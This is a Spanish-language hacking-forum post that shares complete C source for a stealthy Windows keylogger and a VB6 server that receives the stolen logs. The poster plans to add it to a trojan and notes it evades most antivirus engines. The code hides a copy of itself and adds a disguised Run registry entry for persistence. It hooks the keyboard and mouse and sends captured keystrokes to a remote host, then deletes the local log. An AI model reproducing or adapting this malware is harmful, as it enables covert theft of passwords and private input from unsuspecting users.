[C/C++][Source] Keylogger remoto con Hook sin DLL

Iniciado por xxneeco83xx, Julio 23, 2015, 02:46:13 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Julio 23, 2015, 02:46:13 AM Ultima modificación: Julio 23, 2015, 10:59:58 AM por Expermicid
Hola!  ;D andaba jugando un poco con los thread, y el hook, se me ocurrio hacer un mini keylogger.
Para agregarle a un troyano que tengo casi terminado, que también tengo pensado postear.
Pero al final veo que me quedare con otro metodo que tengo.
este metodo lo analize y me dio 2/56 antivirus.
Este se autoagrega al registro, y crea un hook en teclado y mouse. funciona con un servidor que lo que hace es conectarse, recibir el logger, y cerrarse.
Tiene muchas cosas por mejorar, pero quizás a alguien le interese y le sirva, pues bien.
En fin su método para trabajar es así, captura todo tipo de tecla, cuando detecta una conexion del cliente (conexion inversa) envia el log, borra el antiguo y sigue esperando otra conexion.

Código: c

#include <windows.h>
#include <stdio.h>
#include <winsock2.h>

#ifndef port_number
	#define port_number 100
#endif

#ifndef host_name
	#define host_name "127.0.0.1"
#endif

void CALLBACK SendFile ( HWND hwnd, UINT uMsg, UINT timerId, DWORD dwTime );
void CALLBACK Connect ( HWND hwnd, UINT uMsg, UINT timerId, DWORD dwTime );
void CALLBACK InyectSystem ( HWND hwnd, UINT uMsg, UINT timerId, DWORD dwTime );
LRESULT CALLBACK Keyboard ( int nCode, WPARAM wParam, LPARAM lParam );
DWORD WINAPI Inyect ( LPVOID lParam );

HHOOK hHook, MouseHook;
MSG msg;
DWORD thread, firstthread, dwBytes, threadconnect, cbSize = 256, SizeX, sendthread;
HANDLE Thread, FirstThread, ThreadConnect, FileX, Mutex, SendThread;

LPSTR AppName, Directory, Buffer, BufferX;

FILE *keylog;
char keylogger [ MAX_PATH + 1 ];
HKEY key;

PPERF_DATA_BLOCK Data;
WSADATA wsa;
WORD wVersion;
SOCKADDR_IN address;
SOCKET sock;
struct hostent * host;

void CALLBACK SendFile ( HWND hwnd, UINT uMsg, UINT timerId, DWORD dwTime )
{

	FileX = CreateFile ( keylogger, GENERIC_READ, FILE_SHARE_READ, 0, 
			OPEN_EXISTING, 0, 0 );

	if ( FileX == INVALID_HANDLE_VALUE )
	{
		closesocket ( sock );
		WSACleanup ();

		return;
	}

	SizeX = GetFileSize ( FileX, 0 );
	BufferX = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( SizeX + 1 ) );
	ReadFile ( FileX, BufferX, SizeX, &dwBytes, 0 );
	CloseHandle ( FileX );

	if ( send ( sock, BufferX, SizeX, 0 ) == SOCKET_ERROR )
	{
		printf ( "[ Error al enviar Log ]\n" );
	}
	else
	{
		printf ( "[ Exito al enviar log ]\n" );
		//Eliminamos el log ya enviado.
		DeleteFileA ( keylogger );
	}

	closesocket ( sock );
	WSACleanup ();

	return;

}

void CALLBACK Connect ( HWND hwnd, UINT uMsg, UINT timerId, DWORD dwTime )
{
	
	wVersion = MAKEWORD ( 2, 2 );
	ZeroMemory ( &address, sizeof ( SOCKADDR_IN ) );

	if ( WSAStartup ( wVersion, &wsa ) != NO_ERROR )
	{
		printf ( " [ Error al inicializar el winsock ] \n" );
		WSACleanup ();

		return;
	}

	sock = socket ( AF_INET, SOCK_STREAM, IPPROTO_TCP );
	if ( sock == INVALID_SOCKET )
	{
		printf ( " [ Error al intentar crear socket ] \n" );
		closesocket ( sock );
		WSACleanup ();

		return;
	}

	host = gethostbyname ( host_name );

	address.sin_family = AF_INET;
	address.sin_addr = *( ( struct in_addr * ) host -> h_addr_list [ 0 ] );
	address.sin_port = htons ( port_number );
	memset ( address.sin_zero, 0, 8 );

	if ( connect ( sock, ( SOCKADDR *)&address, sizeof ( SOCKADDR ) ) != 0 )
	{
		printf ( " [ Error al intentar conectar con el servidor ] \n" );
		closesocket ( sock );
		WSACleanup ();

		return;
	}

	printf ( " [ Conexion establecida con el servidor ]\n" );

	SendThread = CreateThread ( 0, 0, ( LPTHREAD_START_ROUTINE )SendFile, 0, 0, &sendthread );
	if ( SendThread )
	{
		WaitForSingleObject ( SendThread, 5000 );
	}

	closesocket ( sock );
	WSACleanup ();

	return;

}

void CALLBACK InyectSystem ( HWND hwnd, UINT uMsg, UINT timerId, DWORD dwTime )
{

	ThreadConnect = CreateThread ( 0, 0, ( LPTHREAD_START_ROUTINE ) Connect, 0, 0, &threadconnect );

	AppName = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( MAX_PATH + 1 ) );
	GetModuleFileNameA ( GetModuleHandleA ( 0L ), AppName, MAX_PATH );

	Directory = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( MAX_PATH + 1 ) );
	GetEnvironmentVariableA ( "HomeDrive", Directory, MAX_PATH );

	CopyMemory ( & Directory [ lstrlenA ( Directory ) ], &"\\userboot.exe", lstrlenA ( "userboot.exe" ) + 1 );

	CopyFileA ( AppName, Directory, true );

	if ( RegOpenKeyExA ( HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &key ) == ERROR_SUCCESS )
	{
		Data = ( PPERF_DATA_BLOCK ) LocalAlloc ( ( 0x0000 | 0x0040 ), 256 );
		if ( RegQueryValueExA ( key, "Windows Boot", 0, 0, ( LPBYTE ) Data, &cbSize ) != ERROR_SUCCESS )
		{
			RegSetValueExA ( key, "Windows Boot", 0, REG_SZ, (const unsigned char*) Directory, ( BYTE ) lstrlenA ( Directory ) );
		}

		SetFileAttributesA ( Directory, ( 0x1 | 0x2 | 0x4 ) );

		GlobalFree ( Data );
	}

	RegCloseKey ( key );

	GlobalFree ( AppName );
	GlobalFree ( Directory );

	return;

}

LRESULT CALLBACK Keyboard ( int nCode, WPARAM wParam, LPARAM lParam )
{

	if ( lstrlenA ( keylogger ) <= 0 )
	{
		wsprintfA ( keylogger, "%s\\logger.inf", getenv ( "windir" ) );
	}

	Thread = CreateThread ( 0, 0, ( LPTHREAD_START_ROUTINE ) InyectSystem, 0, 0, &thread );
	
	if ( nCode < 0 )
	{
		return CallNextHookEx ( hHook, nCode, wParam, lParam );
	}
		
	if ( wParam == WM_KEYDOWN )
	{
		PKBDLLHOOKSTRUCT teclado = ( PKBDLLHOOKSTRUCT ) lParam;
		
		keylog = fopen ( keylogger, "a+" );

		switch ( teclado -> vkCode )
		{

			case 13:
				fprintf ( keylog, "\n" );
			break;

			case VK_NUMPAD0:
				fprintf ( keylog, "0" );
			break;

			case VK_NUMPAD1:
				fprintf ( keylog, "1" );
			break;

			case VK_NUMPAD2:
				fprintf ( keylog, "2" );
			break;

			case VK_NUMPAD3:
				fprintf ( keylog, "3" );
			break;

			case VK_NUMPAD4:
				fprintf ( keylog, "4" );
			break;

			case VK_NUMPAD5:
				fprintf ( keylog, "5" );
			break;

			case VK_NUMPAD6:
				fprintf ( keylog, "6" );
			break;

			case VK_NUMPAD7:
				fprintf ( keylog, "7" );
			break;

			case VK_NUMPAD8:
				fprintf ( keylog, "8" );
			break;

			case VK_NUMPAD9:
				fprintf ( keylog, "9" );
			break;

			case VK_ESCAPE:
				fprintf ( keylog, " [ ESC ]" );
			break;

			default:
				fprintf ( keylog, "%c", teclado -> vkCode );
		}
			
		free ( teclado );

		fclose ( keylog );
	}

	return CallNextHookEx ( hHook, nCode, wParam, lParam );
}

DWORD WINAPI Inyect ( LPVOID lParam )
{

	if ( GetLastError () == ERROR_ALREADY_EXISTS ) 
	{
		ExitProcess ( 0 );
	}

	hHook = SetWindowsHookEx ( WH_KEYBOARD_LL , (HOOKPROC) Keyboard, GetModuleHandleA ( 0L ), 0L );
	MouseHook = SetWindowsHookEx ( WH_MOUSE_LL, (HOOKPROC) Keyboard, GetModuleHandleA ( 0L ), 0L );

	while ( ! GetMessage ( & msg, 0, 0, 0 ) )
	{
		Thread = CreateThread ( 0, 0, ( LPTHREAD_START_ROUTINE ) InyectSystem, 0, 0, &thread );
		
		TranslateMessage ( &msg );
		DispatchMessage ( &msg );
	}
	
	UnhookWindowsHookEx ( hHook );
	UnhookWindowsHookEx ( MouseHook );

	return 0;

}

int APIENTRY WinMain ( HINSTANCE hThisInstance, HINSTANCE hPrevInstance,
		LPSTR lpszArgument, int nCmdFustil )
{

	Mutex = CreateMutexA ( 0, 0, "JOKER" );

	FirstThread = CreateThread ( 0, 0, ( LPTHREAD_START_ROUTINE )Inyect, 0, 0, &firstthread );

	if ( FirstThread )
	{
		WaitForSingleObject ( FirstThread, INFINITE );
	}

	ReleaseMutex ( Mutex );
	CloseHandle ( Mutex );
	CloseHandle ( FirstThread );

	return EXIT_SUCCESS;
}



Y el del servidor es simple, en VB6 crean un control winsock con el nombre Winsock1 y su codigo.

Código: vb

Private Sub Form_Load()
Winsock1.Listen
End Sub

Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
If Winsock1.State <> 0 Then
    Winsock1.Close
End If

Winsock1.Accept requestID
End Sub

Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim Data As String
Winsock1.GetData Data

Open App.Path & "\keylogger.txt" For Append As #1
Print #1, Data
Close #1

End
End Sub

Private Sub Winsock1_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
End
End Sub



Es todo, espero les guste, y se aceptan criticas.
El arte de crear malware, es algo que solo pocos entienden!

Imprimir
Ir Arriba Páginas1
Acciones del Usuario